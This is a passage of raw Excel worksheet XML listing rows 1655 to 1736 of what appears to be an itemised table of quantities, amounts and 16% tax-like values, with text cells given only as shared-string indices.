      <c r="D1655" s="238" t="s">
        <v>7706</v>
      </c>
      <c r="E1655" s="238" t="s">
        <v>5364</v>
      </c>
      <c r="F1655" s="238" t="s">
        <v>9232</v>
      </c>
      <c r="G1655" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1655" s="10">
        <v>53</v>
      </c>
      <c r="I1655" s="14">
        <v>1875.63</v>
      </c>
      <c r="J1655" s="15">
        <v>300.1072</v>
      </c>
      <c r="K1655" s="16"/>
    </row>
    <row r="1656" spans="2:11">
      <c r="B1656" s="9">
        <v>1690</v>
      </c>
      <c r="C1656" s="238" t="s">
        <v>9233</v>
      </c>
      <c r="D1656" s="238" t="s">
        <v>9234</v>
      </c>
      <c r="E1656" s="238" t="s">
        <v>9235</v>
      </c>
      <c r="F1656" s="238" t="s">
        <v>9236</v>
      </c>
      <c r="G1656" s="237" t="s">
        <v>461</v>
      </c>
      <c r="H1656" s="10">
        <v>4</v>
      </c>
      <c r="I1656" s="14">
        <v>427.36</v>
      </c>
      <c r="J1656" s="15">
        <v>68.3776</v>
      </c>
      <c r="K1656" s="16"/>
    </row>
    <row r="1657" spans="2:11">
      <c r="B1657" s="9">
        <v>1691</v>
      </c>
      <c r="C1657" s="238" t="s">
        <v>9237</v>
      </c>
      <c r="D1657" s="238" t="s">
        <v>9238</v>
      </c>
      <c r="E1657" s="238" t="s">
        <v>8459</v>
      </c>
      <c r="F1657" s="238" t="s">
        <v>9239</v>
      </c>
      <c r="G1657" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1657" s="10">
        <v>16</v>
      </c>
      <c r="I1657" s="14">
        <v>930.98</v>
      </c>
      <c r="J1657" s="15">
        <v>148.9664</v>
      </c>
      <c r="K1657" s="16"/>
    </row>
    <row r="1658" spans="2:11">
      <c r="B1658" s="9">
        <v>1692</v>
      </c>
      <c r="C1658" s="238" t="s">
        <v>9240</v>
      </c>
      <c r="D1658" s="238" t="s">
        <v>9241</v>
      </c>
      <c r="E1658" s="238" t="s">
        <v>5350</v>
      </c>
      <c r="F1658" s="238" t="s">
        <v>9242</v>
      </c>
      <c r="G1658" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1658" s="10">
        <v>7</v>
      </c>
      <c r="I1658" s="14">
        <v>611.33</v>
      </c>
      <c r="J1658" s="15">
        <v>97.8096</v>
      </c>
      <c r="K1658" s="16"/>
    </row>
    <row r="1659" spans="2:11">
      <c r="B1659" s="9">
        <v>1693</v>
      </c>
      <c r="C1659" s="238" t="s">
        <v>9243</v>
      </c>
      <c r="D1659" s="238" t="s">
        <v>9244</v>
      </c>
      <c r="E1659" s="238" t="s">
        <v>8455</v>
      </c>
      <c r="F1659" s="238" t="s">
        <v>9245</v>
      </c>
      <c r="G1659" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1659" s="10">
        <v>7</v>
      </c>
      <c r="I1659" s="14">
        <v>547.82</v>
      </c>
      <c r="J1659" s="15">
        <v>87.6512</v>
      </c>
      <c r="K1659" s="16"/>
    </row>
    <row r="1660" spans="2:11">
      <c r="B1660" s="9">
        <v>1694</v>
      </c>
      <c r="C1660" s="238" t="s">
        <v>9246</v>
      </c>
      <c r="D1660" s="238" t="s">
        <v>9247</v>
      </c>
      <c r="E1660" s="238" t="s">
        <v>7221</v>
      </c>
      <c r="F1660" s="238" t="s">
        <v>9248</v>
      </c>
      <c r="G1660" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1660" s="10">
        <v>20</v>
      </c>
      <c r="I1660" s="14">
        <v>212.52</v>
      </c>
      <c r="J1660" s="15">
        <v>34.016</v>
      </c>
      <c r="K1660" s="16"/>
    </row>
    <row r="1661" spans="2:11">
      <c r="B1661" s="9">
        <v>1695</v>
      </c>
      <c r="C1661" s="238" t="s">
        <v>9249</v>
      </c>
      <c r="D1661" s="238" t="s">
        <v>9250</v>
      </c>
      <c r="E1661" s="238" t="s">
        <v>4755</v>
      </c>
      <c r="F1661" s="238" t="s">
        <v>9251</v>
      </c>
      <c r="G1661" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1661" s="10">
        <v>6</v>
      </c>
      <c r="I1661" s="14">
        <v>164.1</v>
      </c>
      <c r="J1661" s="15">
        <v>26.256</v>
      </c>
      <c r="K1661" s="16"/>
    </row>
    <row r="1662" spans="2:11">
      <c r="B1662" s="9">
        <v>1696</v>
      </c>
      <c r="C1662" s="238" t="s">
        <v>9252</v>
      </c>
      <c r="D1662" s="238" t="s">
        <v>9253</v>
      </c>
      <c r="E1662" s="238" t="s">
        <v>9254</v>
      </c>
      <c r="F1662" s="238" t="s">
        <v>9255</v>
      </c>
      <c r="G1662" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1662" s="10">
        <v>6</v>
      </c>
      <c r="I1662" s="14">
        <v>1370.62</v>
      </c>
      <c r="J1662" s="15">
        <v>219.3024</v>
      </c>
      <c r="K1662" s="16"/>
    </row>
    <row r="1663" spans="2:11">
      <c r="B1663" s="9">
        <v>1697</v>
      </c>
      <c r="C1663" s="238" t="s">
        <v>9256</v>
      </c>
      <c r="D1663" s="238" t="s">
        <v>9257</v>
      </c>
      <c r="E1663" s="238" t="s">
        <v>5901</v>
      </c>
      <c r="F1663" s="238" t="s">
        <v>9258</v>
      </c>
      <c r="G1663" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1663" s="10">
        <v>1</v>
      </c>
      <c r="I1663" s="14">
        <v>43.59</v>
      </c>
      <c r="J1663" s="15">
        <v>6.9744</v>
      </c>
      <c r="K1663" s="16"/>
    </row>
    <row r="1664" spans="2:11">
      <c r="B1664" s="9">
        <v>1698</v>
      </c>
      <c r="C1664" s="238" t="s">
        <v>9259</v>
      </c>
      <c r="D1664" s="238" t="s">
        <v>8559</v>
      </c>
      <c r="E1664" s="238" t="s">
        <v>5192</v>
      </c>
      <c r="F1664" s="238" t="s">
        <v>9260</v>
      </c>
      <c r="G1664" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1664" s="10">
        <v>479</v>
      </c>
      <c r="I1664" s="14">
        <v>752.02</v>
      </c>
      <c r="J1664" s="15">
        <v>120.3248</v>
      </c>
      <c r="K1664" s="16"/>
    </row>
    <row r="1665" spans="2:11">
      <c r="B1665" s="9">
        <v>1699</v>
      </c>
      <c r="C1665" s="238" t="s">
        <v>9261</v>
      </c>
      <c r="D1665" s="238" t="s">
        <v>6712</v>
      </c>
      <c r="E1665" s="238" t="s">
        <v>5354</v>
      </c>
      <c r="F1665" s="9"/>
      <c r="G1665" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1665" s="10">
        <v>42</v>
      </c>
      <c r="I1665" s="14">
        <v>786.81</v>
      </c>
      <c r="J1665" s="15">
        <v>125.8656</v>
      </c>
      <c r="K1665" s="16"/>
    </row>
    <row r="1666" spans="2:11">
      <c r="B1666" s="9">
        <v>1700</v>
      </c>
      <c r="C1666" s="238" t="s">
        <v>9262</v>
      </c>
      <c r="D1666" s="238" t="s">
        <v>8561</v>
      </c>
      <c r="E1666" s="238" t="s">
        <v>9263</v>
      </c>
      <c r="F1666" s="238" t="s">
        <v>9264</v>
      </c>
      <c r="G1666" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H1666" s="10">
        <v>11</v>
      </c>
      <c r="I1666" s="14">
        <v>3207.37</v>
      </c>
      <c r="J1666" s="15">
        <v>513.1808</v>
      </c>
      <c r="K1666" s="16"/>
    </row>
    <row r="1667" spans="2:11">
      <c r="B1667" s="9">
        <v>1701</v>
      </c>
      <c r="C1667" s="238" t="s">
        <v>9265</v>
      </c>
      <c r="D1667" s="238" t="s">
        <v>6809</v>
      </c>
      <c r="E1667" s="238" t="s">
        <v>6810</v>
      </c>
      <c r="F1667" s="238" t="s">
        <v>9266</v>
      </c>
      <c r="G1667" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H1667" s="10">
        <v>80</v>
      </c>
      <c r="I1667" s="14">
        <v>1145.3</v>
      </c>
      <c r="J1667" s="15">
        <v>183.296</v>
      </c>
      <c r="K1667" s="16"/>
    </row>
    <row r="1668" spans="2:11">
      <c r="B1668" s="9">
        <v>1702</v>
      </c>
      <c r="C1668" s="238" t="s">
        <v>9267</v>
      </c>
      <c r="D1668" s="238" t="s">
        <v>9268</v>
      </c>
      <c r="E1668" s="238" t="s">
        <v>8630</v>
      </c>
      <c r="F1668" s="238" t="s">
        <v>9269</v>
      </c>
      <c r="G1668" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1668" s="10">
        <v>3</v>
      </c>
      <c r="I1668" s="14">
        <v>553.85</v>
      </c>
      <c r="J1668" s="15">
        <v>88.6176</v>
      </c>
      <c r="K1668" s="16"/>
    </row>
    <row r="1669" spans="2:11">
      <c r="B1669" s="9">
        <v>1703</v>
      </c>
      <c r="C1669" s="238" t="s">
        <v>9270</v>
      </c>
      <c r="D1669" s="238" t="s">
        <v>9271</v>
      </c>
      <c r="E1669" s="238" t="s">
        <v>7752</v>
      </c>
      <c r="F1669" s="238" t="s">
        <v>9272</v>
      </c>
      <c r="G1669" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1669" s="10">
        <v>25</v>
      </c>
      <c r="I1669" s="14">
        <v>406.8</v>
      </c>
      <c r="J1669" s="15">
        <v>65.08</v>
      </c>
      <c r="K1669" s="16"/>
    </row>
    <row r="1670" spans="2:11">
      <c r="B1670" s="9">
        <v>1704</v>
      </c>
      <c r="C1670" s="238" t="s">
        <v>9273</v>
      </c>
      <c r="D1670" s="238" t="s">
        <v>9274</v>
      </c>
      <c r="E1670" s="238" t="s">
        <v>9275</v>
      </c>
      <c r="F1670" s="238" t="s">
        <v>9276</v>
      </c>
      <c r="G1670" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1670" s="10">
        <v>31</v>
      </c>
      <c r="I1670" s="14">
        <v>338.31</v>
      </c>
      <c r="J1670" s="15">
        <v>54.1136</v>
      </c>
      <c r="K1670" s="16"/>
    </row>
    <row r="1671" spans="2:11">
      <c r="B1671" s="9">
        <v>1705</v>
      </c>
      <c r="C1671" s="238" t="s">
        <v>9277</v>
      </c>
      <c r="D1671" s="238" t="s">
        <v>9278</v>
      </c>
      <c r="E1671" s="238" t="s">
        <v>7696</v>
      </c>
      <c r="F1671" s="238" t="s">
        <v>9279</v>
      </c>
      <c r="G1671" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1671" s="10">
        <v>4</v>
      </c>
      <c r="I1671" s="14">
        <v>1548.74</v>
      </c>
      <c r="J1671" s="15">
        <v>247.8016</v>
      </c>
      <c r="K1671" s="16"/>
    </row>
    <row r="1672" spans="2:11">
      <c r="B1672" s="9">
        <v>1706</v>
      </c>
      <c r="C1672" s="238" t="s">
        <v>9280</v>
      </c>
      <c r="D1672" s="238" t="s">
        <v>6768</v>
      </c>
      <c r="E1672" s="238" t="s">
        <v>6769</v>
      </c>
      <c r="F1672" s="9"/>
      <c r="G1672" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1672" s="10">
        <v>2</v>
      </c>
      <c r="I1672" s="14">
        <v>584.92</v>
      </c>
      <c r="J1672" s="15">
        <v>93.5872</v>
      </c>
      <c r="K1672" s="16"/>
    </row>
    <row r="1673" spans="2:11">
      <c r="B1673" s="9">
        <v>1707</v>
      </c>
      <c r="C1673" s="238" t="s">
        <v>9281</v>
      </c>
      <c r="D1673" s="238" t="s">
        <v>9282</v>
      </c>
      <c r="E1673" s="238" t="s">
        <v>8445</v>
      </c>
      <c r="F1673" s="238" t="s">
        <v>9283</v>
      </c>
      <c r="G1673" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1673" s="10">
        <v>5</v>
      </c>
      <c r="I1673" s="14">
        <v>85.56</v>
      </c>
      <c r="J1673" s="15">
        <v>13.688</v>
      </c>
      <c r="K1673" s="16"/>
    </row>
    <row r="1674" spans="2:11">
      <c r="B1674" s="9">
        <v>1708</v>
      </c>
      <c r="C1674" s="238" t="s">
        <v>9284</v>
      </c>
      <c r="D1674" s="238" t="s">
        <v>9285</v>
      </c>
      <c r="E1674" s="238" t="s">
        <v>7316</v>
      </c>
      <c r="F1674" s="238" t="s">
        <v>9286</v>
      </c>
      <c r="G1674" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1674" s="10">
        <v>1</v>
      </c>
      <c r="I1674" s="14">
        <v>491.45</v>
      </c>
      <c r="J1674" s="15">
        <v>78.632</v>
      </c>
      <c r="K1674" s="16"/>
    </row>
    <row r="1675" spans="2:11">
      <c r="B1675" s="9">
        <v>1709</v>
      </c>
      <c r="C1675" s="238" t="s">
        <v>9287</v>
      </c>
      <c r="D1675" s="238" t="s">
        <v>9288</v>
      </c>
      <c r="E1675" s="238" t="s">
        <v>9289</v>
      </c>
      <c r="F1675" s="238" t="s">
        <v>9290</v>
      </c>
      <c r="G1675" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1675" s="10">
        <v>2</v>
      </c>
      <c r="I1675" s="14">
        <v>869.52</v>
      </c>
      <c r="J1675" s="15">
        <v>139.1232</v>
      </c>
      <c r="K1675" s="16"/>
    </row>
    <row r="1676" spans="2:11">
      <c r="B1676" s="9">
        <v>1710</v>
      </c>
      <c r="C1676" s="238" t="s">
        <v>9291</v>
      </c>
      <c r="D1676" s="238" t="s">
        <v>9292</v>
      </c>
      <c r="E1676" s="238" t="s">
        <v>9293</v>
      </c>
      <c r="F1676" s="9"/>
      <c r="G1676" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1676" s="10">
        <v>3</v>
      </c>
      <c r="I1676" s="14">
        <v>88.32</v>
      </c>
      <c r="J1676" s="15">
        <v>14.1312</v>
      </c>
      <c r="K1676" s="16"/>
    </row>
    <row r="1677" spans="2:11">
      <c r="B1677" s="9">
        <v>1711</v>
      </c>
      <c r="C1677" s="238" t="s">
        <v>9294</v>
      </c>
      <c r="D1677" s="238" t="s">
        <v>6712</v>
      </c>
      <c r="E1677" s="238" t="s">
        <v>9295</v>
      </c>
      <c r="F1677" s="9"/>
      <c r="G1677" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1677" s="10">
        <v>42</v>
      </c>
      <c r="I1677" s="14">
        <v>616.56</v>
      </c>
      <c r="J1677" s="15">
        <v>98.6496</v>
      </c>
      <c r="K1677" s="16"/>
    </row>
    <row r="1678" spans="2:11">
      <c r="B1678" s="9">
        <v>1712</v>
      </c>
      <c r="C1678" s="238" t="s">
        <v>9296</v>
      </c>
      <c r="D1678" s="238" t="s">
        <v>9297</v>
      </c>
      <c r="E1678" s="238" t="s">
        <v>7796</v>
      </c>
      <c r="F1678" s="238" t="s">
        <v>9298</v>
      </c>
      <c r="G1678" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1678" s="10">
        <v>7</v>
      </c>
      <c r="I1678" s="14">
        <v>239.88</v>
      </c>
      <c r="J1678" s="15">
        <v>38.3824</v>
      </c>
      <c r="K1678" s="16"/>
    </row>
    <row r="1679" spans="2:11">
      <c r="B1679" s="9">
        <v>1713</v>
      </c>
      <c r="C1679" s="238" t="s">
        <v>9299</v>
      </c>
      <c r="D1679" s="238" t="s">
        <v>9300</v>
      </c>
      <c r="E1679" s="238" t="s">
        <v>7221</v>
      </c>
      <c r="F1679" s="238" t="s">
        <v>9301</v>
      </c>
      <c r="G1679" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1679" s="10">
        <v>4</v>
      </c>
      <c r="I1679" s="14">
        <v>28.02</v>
      </c>
      <c r="J1679" s="15">
        <v>4.4864</v>
      </c>
      <c r="K1679" s="16"/>
    </row>
    <row r="1680" spans="2:11">
      <c r="B1680" s="9">
        <v>1714</v>
      </c>
      <c r="C1680" s="238" t="s">
        <v>9302</v>
      </c>
      <c r="D1680" s="238" t="s">
        <v>9303</v>
      </c>
      <c r="E1680" s="238" t="s">
        <v>9304</v>
      </c>
      <c r="F1680" s="238" t="s">
        <v>9305</v>
      </c>
      <c r="G1680" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1680" s="10">
        <v>7</v>
      </c>
      <c r="I1680" s="14">
        <v>945.34</v>
      </c>
      <c r="J1680" s="15">
        <v>151.256</v>
      </c>
      <c r="K1680" s="16"/>
    </row>
    <row r="1681" spans="2:11">
      <c r="B1681" s="9">
        <v>1715</v>
      </c>
      <c r="C1681" s="238" t="s">
        <v>9306</v>
      </c>
      <c r="D1681" s="238" t="s">
        <v>9307</v>
      </c>
      <c r="E1681" s="238" t="s">
        <v>9308</v>
      </c>
      <c r="F1681" s="238" t="s">
        <v>9309</v>
      </c>
      <c r="G1681" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1681" s="10">
        <v>2</v>
      </c>
      <c r="I1681" s="14">
        <v>1098.12</v>
      </c>
      <c r="J1681" s="15">
        <v>175.6992</v>
      </c>
      <c r="K1681" s="16"/>
    </row>
    <row r="1682" spans="2:11">
      <c r="B1682" s="9">
        <v>1716</v>
      </c>
      <c r="C1682" s="238" t="s">
        <v>9310</v>
      </c>
      <c r="D1682" s="238" t="s">
        <v>9311</v>
      </c>
      <c r="E1682" s="238" t="s">
        <v>9312</v>
      </c>
      <c r="F1682" s="9"/>
      <c r="G1682" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1682" s="10">
        <v>10</v>
      </c>
      <c r="I1682" s="14">
        <v>42.73</v>
      </c>
      <c r="J1682" s="15">
        <v>6.832</v>
      </c>
      <c r="K1682" s="16"/>
    </row>
    <row r="1683" spans="2:11">
      <c r="B1683" s="9">
        <v>1717</v>
      </c>
      <c r="C1683" s="238" t="s">
        <v>9313</v>
      </c>
      <c r="D1683" s="238" t="s">
        <v>9314</v>
      </c>
      <c r="E1683" s="238" t="s">
        <v>5028</v>
      </c>
      <c r="F1683" s="238" t="s">
        <v>9315</v>
      </c>
      <c r="G1683" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1683" s="10">
        <v>2</v>
      </c>
      <c r="I1683" s="14">
        <v>488.8</v>
      </c>
      <c r="J1683" s="15">
        <v>78.208</v>
      </c>
      <c r="K1683" s="16"/>
    </row>
    <row r="1684" spans="2:11">
      <c r="B1684" s="9">
        <v>1718</v>
      </c>
      <c r="C1684" s="238" t="s">
        <v>9316</v>
      </c>
      <c r="D1684" s="238" t="s">
        <v>9317</v>
      </c>
      <c r="E1684" s="238" t="s">
        <v>7949</v>
      </c>
      <c r="F1684" s="238" t="s">
        <v>9318</v>
      </c>
      <c r="G1684" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1684" s="10">
        <v>4</v>
      </c>
      <c r="I1684" s="14">
        <v>369.23</v>
      </c>
      <c r="J1684" s="15">
        <v>59.0784</v>
      </c>
      <c r="K1684" s="16"/>
    </row>
    <row r="1685" spans="2:11">
      <c r="B1685" s="9">
        <v>1719</v>
      </c>
      <c r="C1685" s="238" t="s">
        <v>9319</v>
      </c>
      <c r="D1685" s="238" t="s">
        <v>9320</v>
      </c>
      <c r="E1685" s="238" t="s">
        <v>9321</v>
      </c>
      <c r="F1685" s="238" t="s">
        <v>7689</v>
      </c>
      <c r="G1685" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1685" s="10">
        <v>1</v>
      </c>
      <c r="I1685" s="14">
        <v>555.56</v>
      </c>
      <c r="J1685" s="15">
        <v>88.8896</v>
      </c>
      <c r="K1685" s="16"/>
    </row>
    <row r="1686" spans="2:11">
      <c r="B1686" s="9">
        <v>1720</v>
      </c>
      <c r="C1686" s="238" t="s">
        <v>9322</v>
      </c>
      <c r="D1686" s="238" t="s">
        <v>9323</v>
      </c>
      <c r="E1686" s="238" t="s">
        <v>7825</v>
      </c>
      <c r="F1686" s="238" t="s">
        <v>9324</v>
      </c>
      <c r="G1686" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1686" s="10">
        <v>18</v>
      </c>
      <c r="I1686" s="14">
        <v>621.29</v>
      </c>
      <c r="J1686" s="15">
        <v>99.4176</v>
      </c>
      <c r="K1686" s="16"/>
    </row>
    <row r="1687" spans="2:11">
      <c r="B1687" s="9">
        <v>1721</v>
      </c>
      <c r="C1687" s="238" t="s">
        <v>9325</v>
      </c>
      <c r="D1687" s="238" t="s">
        <v>9326</v>
      </c>
      <c r="E1687" s="238" t="s">
        <v>3854</v>
      </c>
      <c r="F1687" s="238" t="s">
        <v>9327</v>
      </c>
      <c r="G1687" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1687" s="10">
        <v>1</v>
      </c>
      <c r="I1687" s="14">
        <v>846.15</v>
      </c>
      <c r="J1687" s="15">
        <v>135.384</v>
      </c>
      <c r="K1687" s="16"/>
    </row>
    <row r="1688" spans="2:11">
      <c r="B1688" s="9">
        <v>1722</v>
      </c>
      <c r="C1688" s="238" t="s">
        <v>9328</v>
      </c>
      <c r="D1688" s="238" t="s">
        <v>9329</v>
      </c>
      <c r="E1688" s="238" t="s">
        <v>7227</v>
      </c>
      <c r="F1688" s="238" t="s">
        <v>9330</v>
      </c>
      <c r="G1688" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1688" s="10">
        <v>2</v>
      </c>
      <c r="I1688" s="14">
        <v>78.63</v>
      </c>
      <c r="J1688" s="15">
        <v>12.5824</v>
      </c>
      <c r="K1688" s="16"/>
    </row>
    <row r="1689" spans="2:11">
      <c r="B1689" s="9">
        <v>1723</v>
      </c>
      <c r="C1689" s="238" t="s">
        <v>9331</v>
      </c>
      <c r="D1689" s="238" t="s">
        <v>9332</v>
      </c>
      <c r="E1689" s="238" t="s">
        <v>7995</v>
      </c>
      <c r="F1689" s="9"/>
      <c r="G1689" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1689" s="10">
        <v>16</v>
      </c>
      <c r="I1689" s="14">
        <v>1362.04</v>
      </c>
      <c r="J1689" s="15">
        <v>217.9328</v>
      </c>
      <c r="K1689" s="16"/>
    </row>
    <row r="1690" spans="2:11">
      <c r="B1690" s="9">
        <v>1724</v>
      </c>
      <c r="C1690" s="238" t="s">
        <v>9333</v>
      </c>
      <c r="D1690" s="238" t="s">
        <v>9334</v>
      </c>
      <c r="E1690" s="238" t="s">
        <v>9335</v>
      </c>
      <c r="F1690" s="9"/>
      <c r="G1690" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1690" s="10">
        <v>6</v>
      </c>
      <c r="I1690" s="14">
        <v>642.75</v>
      </c>
      <c r="J1690" s="15">
        <v>102.8448</v>
      </c>
      <c r="K1690" s="16"/>
    </row>
    <row r="1691" spans="2:11">
      <c r="B1691" s="9">
        <v>1725</v>
      </c>
      <c r="C1691" s="238" t="s">
        <v>9336</v>
      </c>
      <c r="D1691" s="238" t="s">
        <v>9337</v>
      </c>
      <c r="E1691" s="238" t="s">
        <v>7745</v>
      </c>
      <c r="F1691" s="238" t="s">
        <v>9338</v>
      </c>
      <c r="G1691" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1691" s="10">
        <v>12</v>
      </c>
      <c r="I1691" s="14">
        <v>697.43</v>
      </c>
      <c r="J1691" s="15">
        <v>111.5904</v>
      </c>
      <c r="K1691" s="16"/>
    </row>
    <row r="1692" spans="2:11">
      <c r="B1692" s="9">
        <v>1726</v>
      </c>
      <c r="C1692" s="238" t="s">
        <v>9339</v>
      </c>
      <c r="D1692" s="238" t="s">
        <v>9340</v>
      </c>
      <c r="E1692" s="238" t="s">
        <v>7745</v>
      </c>
      <c r="F1692" s="238" t="s">
        <v>9341</v>
      </c>
      <c r="G1692" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1692" s="10">
        <v>1</v>
      </c>
      <c r="I1692" s="14">
        <v>40.63</v>
      </c>
      <c r="J1692" s="15">
        <v>6.5008</v>
      </c>
      <c r="K1692" s="16"/>
    </row>
    <row r="1693" spans="2:11">
      <c r="B1693" s="9">
        <v>1727</v>
      </c>
      <c r="C1693" s="238" t="s">
        <v>9342</v>
      </c>
      <c r="D1693" s="238" t="s">
        <v>9343</v>
      </c>
      <c r="E1693" s="238" t="s">
        <v>7796</v>
      </c>
      <c r="F1693" s="238" t="s">
        <v>9344</v>
      </c>
      <c r="G1693" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1693" s="10">
        <v>1</v>
      </c>
      <c r="I1693" s="14">
        <v>93.97</v>
      </c>
      <c r="J1693" s="15">
        <v>15.0352</v>
      </c>
      <c r="K1693" s="16"/>
    </row>
    <row r="1694" spans="2:11">
      <c r="B1694" s="9">
        <v>1728</v>
      </c>
      <c r="C1694" s="238" t="s">
        <v>9345</v>
      </c>
      <c r="D1694" s="238" t="s">
        <v>9346</v>
      </c>
      <c r="E1694" s="238" t="s">
        <v>5354</v>
      </c>
      <c r="F1694" s="238" t="s">
        <v>9324</v>
      </c>
      <c r="G1694" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1694" s="10">
        <v>420</v>
      </c>
      <c r="I1694" s="14">
        <v>428.23</v>
      </c>
      <c r="J1694" s="15">
        <v>68.544</v>
      </c>
      <c r="K1694" s="16"/>
    </row>
    <row r="1695" spans="2:11">
      <c r="B1695" s="9">
        <v>1729</v>
      </c>
      <c r="C1695" s="238" t="s">
        <v>9347</v>
      </c>
      <c r="D1695" s="238" t="s">
        <v>9348</v>
      </c>
      <c r="E1695" s="238" t="s">
        <v>7399</v>
      </c>
      <c r="F1695" s="238" t="s">
        <v>7784</v>
      </c>
      <c r="G1695" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1695" s="10">
        <v>10</v>
      </c>
      <c r="I1695" s="14">
        <v>9.82</v>
      </c>
      <c r="J1695" s="15">
        <v>1.568</v>
      </c>
      <c r="K1695" s="16"/>
    </row>
    <row r="1696" spans="2:11">
      <c r="B1696" s="9">
        <v>1730</v>
      </c>
      <c r="C1696" s="238" t="s">
        <v>9349</v>
      </c>
      <c r="D1696" s="238" t="s">
        <v>9350</v>
      </c>
      <c r="E1696" s="238" t="s">
        <v>5354</v>
      </c>
      <c r="F1696" s="238" t="s">
        <v>7787</v>
      </c>
      <c r="G1696" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1696" s="10">
        <v>40</v>
      </c>
      <c r="I1696" s="14">
        <v>205.13</v>
      </c>
      <c r="J1696" s="15">
        <v>32.832</v>
      </c>
      <c r="K1696" s="16"/>
    </row>
    <row r="1697" spans="2:11">
      <c r="B1697" s="9">
        <v>1731</v>
      </c>
      <c r="C1697" s="238" t="s">
        <v>9351</v>
      </c>
      <c r="D1697" s="238" t="s">
        <v>7792</v>
      </c>
      <c r="E1697" s="238" t="s">
        <v>4747</v>
      </c>
      <c r="F1697" s="238" t="s">
        <v>7793</v>
      </c>
      <c r="G1697" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1697" s="10">
        <v>20</v>
      </c>
      <c r="I1697" s="14">
        <v>401.95</v>
      </c>
      <c r="J1697" s="15">
        <v>64.32</v>
      </c>
      <c r="K1697" s="16"/>
    </row>
    <row r="1698" spans="2:11">
      <c r="B1698" s="9">
        <v>1732</v>
      </c>
      <c r="C1698" s="238" t="s">
        <v>9352</v>
      </c>
      <c r="D1698" s="238" t="s">
        <v>9353</v>
      </c>
      <c r="E1698" s="238" t="s">
        <v>9354</v>
      </c>
      <c r="F1698" s="238" t="s">
        <v>9355</v>
      </c>
      <c r="G1698" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1698" s="10">
        <v>2</v>
      </c>
      <c r="I1698" s="14">
        <v>23.93</v>
      </c>
      <c r="J1698" s="15">
        <v>3.8304</v>
      </c>
      <c r="K1698" s="16"/>
    </row>
    <row r="1699" spans="2:11">
      <c r="B1699" s="9">
        <v>1733</v>
      </c>
      <c r="C1699" s="238" t="s">
        <v>9356</v>
      </c>
      <c r="D1699" s="238" t="s">
        <v>7706</v>
      </c>
      <c r="E1699" s="238" t="s">
        <v>5364</v>
      </c>
      <c r="F1699" s="9"/>
      <c r="G1699" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1699" s="10">
        <v>290</v>
      </c>
      <c r="I1699" s="14">
        <v>2823.41</v>
      </c>
      <c r="J1699" s="15">
        <v>451.936</v>
      </c>
      <c r="K1699" s="16"/>
    </row>
    <row r="1700" spans="2:11">
      <c r="B1700" s="9">
        <v>1734</v>
      </c>
      <c r="C1700" s="238" t="s">
        <v>9357</v>
      </c>
      <c r="D1700" s="238" t="s">
        <v>9358</v>
      </c>
      <c r="E1700" s="238" t="s">
        <v>7839</v>
      </c>
      <c r="F1700" s="238" t="s">
        <v>9359</v>
      </c>
      <c r="G1700" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1700" s="10">
        <v>1</v>
      </c>
      <c r="I1700" s="14">
        <v>478.63</v>
      </c>
      <c r="J1700" s="15">
        <v>76.5808</v>
      </c>
      <c r="K1700" s="16"/>
    </row>
    <row r="1701" spans="2:11">
      <c r="B1701" s="9">
        <v>1735</v>
      </c>
      <c r="C1701" s="238" t="s">
        <v>9360</v>
      </c>
      <c r="D1701" s="238" t="s">
        <v>9361</v>
      </c>
      <c r="E1701" s="238" t="s">
        <v>7839</v>
      </c>
      <c r="F1701" s="238" t="s">
        <v>9362</v>
      </c>
      <c r="G1701" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1701" s="10">
        <v>1</v>
      </c>
      <c r="I1701" s="14">
        <v>735.04</v>
      </c>
      <c r="J1701" s="15">
        <v>117.6064</v>
      </c>
      <c r="K1701" s="16"/>
    </row>
    <row r="1702" spans="2:11">
      <c r="B1702" s="9">
        <v>1736</v>
      </c>
      <c r="C1702" s="238" t="s">
        <v>9363</v>
      </c>
      <c r="D1702" s="238" t="s">
        <v>9364</v>
      </c>
      <c r="E1702" s="238" t="s">
        <v>3856</v>
      </c>
      <c r="F1702" s="238" t="s">
        <v>9365</v>
      </c>
      <c r="G1702" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1702" s="10">
